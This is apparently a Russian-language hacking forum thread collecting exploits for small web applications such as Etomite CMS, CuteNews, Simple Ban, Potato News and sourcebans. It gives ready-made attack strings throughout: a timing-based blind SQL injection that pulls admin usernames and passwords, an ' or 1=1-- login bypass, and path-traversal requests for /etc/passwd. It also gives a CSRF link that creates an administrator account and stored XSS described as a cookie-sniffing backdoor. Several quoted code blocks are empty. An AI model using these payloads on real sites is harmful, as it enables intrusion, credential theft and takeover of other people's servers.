![]() |
Cifshanghai Script
Download: http://www.cifshanghai.com/ Vuln File: new.php Exploit: Код:
http://localhost/[path]/new.php?id=[SQL]Цитата:
|
Etomite CMS Blind Sql injection, чтения локальных файлов
Производитель:http://www.etomite.org/ Продукт:Etomite CMS Версия:1.1 Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off): PHP код:
Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)): PHP код:
PHP код:
|
CuteNews
CSRF: Код:
http://localhost/cutenews/index.phpКод:
http://localhost/cutenews/index.php?regusername=underwater®password=_123456®nickname=underwater®email=underwater%40gmail.com®level=1&action=adduser&mod=editusersЦитата:
|
Уязвимости Simple Ban
download: http://boedesign.com/downloads/simpleban_v1.5.zip Blind SQL-injection(требования: magic_quotes=off) updatenote.php уязвимый код: PHP код:
Код:
updatenote.php?content=9999'+or+if(ascii(substring((select+concat_ws(0x3a,user,pass)+from+admin),1,1))>1,BENCHMARK(2000000,md5(current_date)),2)--+bypass(требования: magic_quotes=off) login.php уязвимый код: PHP код:
логинимся с именем: ' or 1=1-- (с) Iceangel_ |
Цитата:
/forums/profile.php Переменая $phpEx, судя по коду, должна была определятся в extension.inc, но разработчик по невнимательности, не включил в файл в дистрибутив, вследствии имеем возможность определить переменную и получить локальный инклуд уязвимый код: PHP код:
Код:
/forums/profile.php?phpEx=../../../../../../../../../../../etc/passwd(с) Iceangel_ |
Уязвимости Potato News 1.0.2
Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip LFI (требования: register_globals=on) /timeago.php уязвимый код: PHP код:
Код:
/timeago.php?nid=../../../../../../../../../../../../etc/passwd(с) Iceangel_ |
Программа: WebEyes Guest Book 3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «mesajid» сценарием yorum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjec ts |
поисковик TSEP <=0.942.02
http://milw0rm.com/exploits/9057 |
Обзор уязвимостей sourcebans
Sourcebans - комплекс банов на игровых серверах (если сервер есть в списке и ркон к нему подходит (не буду объяснять что такое ркон))
Офф сайт: sourcebans.net Статистика уязвимостей Всего уязвимостей найденно: 5 XSS: 3 MySql Error: 1 Плохая проверка данных: 1 1. ACTIVE XSS Уязвимая страница: sait.ru/index.php?p=submit Проблемный файл: pages/page.submit.php Уязвимые поля: Comments/Комменты, Players IP/Айпи игроков, STEAM_ID Описание: Подставляем в уязв. поля алерт, и он срабатывает у админа если он зайдет в bans (управление банами) Минус что если по почте придет отчет что бан добавлен то будут детали бана в письме и так пропалят xss Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 2.ACTIVE XSS 2 Уязвимая страница: sait.ru/index.php Проблемный файл: Точно не известно Уязвимые поля: Intro Title Описание: В случае если вы потеряли взломанный аккаунт то его можно контролировать если вы заранее подставили скрипт на сниффер в поле "Intro Title" но опять таки админ может пропалить :) Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.2 (включительно 1.4.2)(скорее всего и в 1.4.3 так как прикрывают токо паблик уязвимости(сам не тестил в версии 1.4.3/1.4.4/1.4.5))(указанные баги найденны за 3 дня и в паблике не обнаруживались) 3.ACTIVE XSS 3 Уязвимая страница: sait.ru/index.php?p=admin&c=mods Проблемный файл: pages/admin.edit.mod.php Уязвимые поля: Mod Name, Mod Folder Описание: Не достаточная обработка входных данных, в связи с этим возможна ACTIVE XSS в выводе модов а так же в выводе серверов в админке! Можно использовать как бекдор для в случае если аккаунт потерян Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 4. MySql Error Уязвимая страница: sait.ru/index.php?p=submit Проблемный файл: pages/page.submit.php Уязвимые параметры: <select id="server" name="server"> в выборе серверов, сам параметр value Описание: Описания нету Автор уязвимости: .wolmer Версии: во всех версиях до 1.4.5 (включительно 1.4.5) 5. Не достаточная проверка данных Уязвимая страница: sait.ru/index.php Проблемный файл: includes/sb-callback.php Уязвимые параметры: отсуствуют Описание: Не достаточная обработка при смене емаила Ничего не проверяется, следовательно можно получить полный доступ сменив емаил админа (поменяв ID админа в параметре поста xajaxargs[]) Для того чтобы сменить емаил удаленно просто надо поснифать http пакеты на локальном хосте (когда меняем емаил) и отправить их на указанный адрес в интернете (где расположен двиг. sourcebans) Автор уязвимости: Mr. Anonymous Версии: во всех версиях до 1.4.2 (включительно 1.4.2) На этом у меня все, в следующем обзоре уязв. sourcebans попробую рассказать про заливку шелла и про многие другие уязвимости этого движка |
phpBMS v0.96
половина скриптов в дирах Код:
phpBMS v0.96 |
| Время: 21:22 |